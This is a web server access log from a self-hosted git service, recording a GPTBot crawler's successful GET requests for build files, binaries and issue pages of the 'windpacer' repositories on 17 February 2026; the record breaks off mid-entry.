"/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2f__pycache__%2fcalculator.cpython-312.pyc" [Client 74.7.227.38] [Length 20809] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/calculator.cpython-312.pyc" +[17/Feb/2026:18:09:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&state=closed&type=all" +[17/Feb/2026:18:09:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:18:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13526] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13484] [Gzip 4.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13561] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13562] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13560] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:18:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11104] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11103] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11103] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11618] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11096] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24307] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21633] [Gzip 28.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24300] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11626] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:18:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16063] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16063] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16069] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11327] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16063] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11102] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11105] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11325] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16064] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24302] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11324] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11102] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:18:09:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11101] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:09:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11619] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:09:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16063] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:09:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 